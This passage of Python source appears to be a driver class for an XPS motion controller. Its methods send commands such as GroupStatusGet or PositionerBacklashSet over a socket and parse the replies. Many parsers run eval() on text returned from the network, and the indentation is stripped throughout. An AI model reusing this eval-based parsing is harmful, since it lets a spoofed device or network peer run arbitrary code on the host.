while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionPCORawEncoderGet : Return PCO raw encoder positions
def GroupPositionPCORawEncoderGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionPCORawEncoderGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionSetpointGet : Return setpoint positions
def GroupPositionSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionTargetGet : Return target positions
def GroupPositionTargetGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionTargetGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupReferencingActionExecute : Execute an action in referencing mode
def GroupReferencingActionExecute (self, socketId, PositionerName, ReferencingAction, ReferencingSensor, ReferencingParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingActionExecute(' + PositionerName + ',' + ReferencingAction + ',' + ReferencingSensor + ',' + str(ReferencingParameter) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStart : Enter referencing mode
def GroupReferencingStart (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStart(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStop : Exit referencing mode
def GroupReferencingStop (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStop(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusGet : Return group status
def GroupStatusGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusGet(' + GroupName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupStatusStringGet : Return the group status string corresponding to the group status code
def GroupStatusStringGet (self, socketId, GroupStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusStringGet(' + str(GroupStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupVelocityCurrentGet : Return current velocities
def GroupVelocityCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupVelocityCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# KillAll : Put all groups in 'Not initialized' state
def KillAll (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'KillAll()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingPositionParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingPositionParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingVelocityParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersGet(' + PositionerName + ',char *,double *,double *,double *,int *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingVelocityParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, DeadBandThreshold, Order, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(DeadBandThreshold) + ',' + str(Order) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashGet : Read backlash value and status
def PositionerBacklashGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashGet(' + PositionerName + ',double *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerBacklashSet : Set backlash value
def PositionerBacklashSet (self, socketId, PositionerName, BacklashValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashSet(' + PositionerName + ',' + str(BacklashValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashEnable : Enable the backlash
def PositionerBacklashEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashDisable : Disable the backlash
def PositionerBacklashDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersSet : Update filters parameters
def PositionerCorrectorNotchFiltersSet (self, socketId, PositionerName, NotchFrequency1, NotchBandwith1, NotchGain1, NotchFrequency2, NotchBandwith2, NotchGain2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersSet(' + PositionerName + ',' + str(NotchFrequency1) + ',' + str(NotchBandwith1) + ',' + str(NotchGain1) + ',' + str(NotchFrequency2) + ',' + str(NotchBandwith2) + ',' + str(NotchGain2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersGet : Read filters parameters
def PositionerCorrectorNotchFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFAccelerationSet : Update corrector parameters
def PositionerCorrectorPIDFFAccelerationSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainAcceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainAcceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFAccelerationGet : Read corrector parameters
def PositionerCorrectorPIDFFAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFVelocitySet : Update corrector parameters
def PositionerCorrectorPIDFFVelocitySet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocitySet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFVelocityGet : Read corrector parameters
def PositionerCorrectorPIDFFVelocityGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocityGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDDualFFVoltageSet : Update corrector parameters
def PositionerCorrectorPIDDualFFVoltageSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity, FeedForwardGainAcceleration, Friction):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ',' + str(FeedForwardGainAcceleration) + ',' + str(Friction) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDDualFFVoltageGet : Read corrector parameters
def PositionerCorrectorPIDDualFFVoltageGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(14):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIPositionSet : Update corrector parameters
def PositionerCorrectorPIPositionSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, IntegrationTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(IntegrationTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIPositionGet : Read corrector parameters
def PositionerCorrectorPIPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionGet(' + PositionerName + ',bool *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorTypeGet : Read corrector type
def PositionerCorrectorTypeGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorTypeGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCurrentVelocityAccelerationFiltersGet : Get current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCurrentVelocityAccelerationFiltersSet : Set current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersSet (self, socketId, PositionerName, CurrentVelocityCutOffFrequency, CurrentAccelerationCutOffFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersSet(' + PositionerName + ',' + str(CurrentVelocityCutOffFrequency) + ',' + str(CurrentAccelerationCutOffFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverFiltersGet : Get driver filters parameters
def PositionerDriverFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverFiltersSet : Set driver filters parameters
def PositionerDriverFiltersSet (self, socketId, PositionerName, KI, NotchFrequency, NotchBandwidth, NotchGain, LowpassFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersSet(' + PositionerName + ',' + str(KI) + ',' + str(NotchFrequency) + ',' + str(NotchBandwidth) + ',' + str(NotchGain) + ',' + str(LowpassFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverPositionOffsetsGet : Get driver stage and gage position offset
def PositionerDriverPositionOffsetsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverPositionOffsetsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverStatusGet : Read positioner driver status
def PositionerDriverStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerDriverStatusStringGet : Return the positioner driver status string corresponding to the positioner error code
def PositionerDriverStatusStringGet (self, socketId, PositionerDriverStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusStringGet(' + str(PositionerDriverStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerEncoderAmplitudeValuesGet : Read analog interpolated encoder amplitude values
def PositionerEncoderAmplitudeValuesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderAmplitudeValuesGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerEncoderCalibrationParametersGet : Read analog interpolated encoder calibration parameters
def PositionerEncoderCalibrationParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderCalibrationParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerErrorGet : Read and clear positioner error code
def PositionerErrorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorRead : Read only positioner error code without clear it
def PositionerErrorRead (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorRead(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorStringGet : Return the positioner status string corresponding to the positioner error code
def PositionerErrorStringGet (self, socketId, PositionerErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorStringGet(' + str(PositionerErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExcitationSignalGet : Read disturbing signal parameters
def PositionerExcitationSignalGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalGet(' + PositionerName + ',int *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerExcitationSignalSet : Update disturbing signal parameters
def PositionerExcitationSignalSet (self, socketId, PositionerName, Mode, Frequency, Amplitude, Time):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalSet(' + PositionerName + ',' + str(Mode) + ',' + str(Frequency) + ',' + str(Amplitude) + ',' + str(Time) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExternalLatchPositionGet : Read external latch position
def PositionerExternalLatchPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExternalLatchPositionGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusGet : Read positioner hardware status
def PositionerHardwareStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusStringGet : Return the positioner hardware status string corresponding to the positioner error code
def PositionerHardwareStatusStringGet (self, socketId, PositionerHardwareStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusStringGet(' + str(PositionerHardwareStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardInterpolatorFactorGet : Get hard interpolator parameters
def PositionerHardInterpolatorFactorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardInterpolatorFactorSet : Set hard interpolator parameters
def PositionerHardInterpolatorFactorSet (self, socketId, PositionerName, InterpolationFactor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorSet(' + PositionerName + ',' + str(InterpolationFactor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerMaximumVelocityAndAccelerationGet : Return maximum velocity and acceleration of the positioner
def PositionerMaximumVelocityAndAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMaximumVelocityAndAccelerationGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneGet : Read motion done parameters
def PositionerMotionDoneGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneSet : Update motion done parameters
def PositionerMotionDoneSet (self, socketId, PositionerName, PositionWindow, VelocityWindow, CheckingTime, MeanPeriod, TimeOut):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneSet(' + PositionerName + ',' + str(PositionWindow) + ',' + str(VelocityWindow) + ',' + str(CheckingTime) + ',' + str(MeanPeriod) + ',' + str(TimeOut) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBAlwaysEnable : Enable AquadB signal in always mode
def PositionerPositionCompareAquadBAlwaysEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBAlwaysEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBWindowedGet : Read position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedGet(' + PositionerName + ',double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareAquadBWindowedSet : Set position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareGet : Read position compare parameters
def PositionerPositionCompareGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareSet : Set position compare parameters
def PositionerPositionCompareSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, PositionStep):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(PositionStep) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareEnable : Enable position compare
def PositionerPositionCompareEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareDisable : Disable position compare
def PositionerPositionCompareDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionComparePulseParametersGet : Get position compare PCO pulse parameters
def PositionerPositionComparePulseParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionComparePulseParametersSet : Set position compare PCO pulse parameters
def PositionerPositionComparePulseParametersSet (self, socketId, PositionerName, PCOPulseWidth, EncoderSettlingTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersSet(' + PositionerName + ',' + str(PCOPulseWidth) + ',' + str(EncoderSettlingTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerRawEncoderPositionGet : Get the raw encoder position
def PositionerRawEncoderPositionGet (self, socketId, PositionerName, UserEncoderPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerRawEncoderPositionGet(' + PositionerName + ',' + str(UserEncoderPosition) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
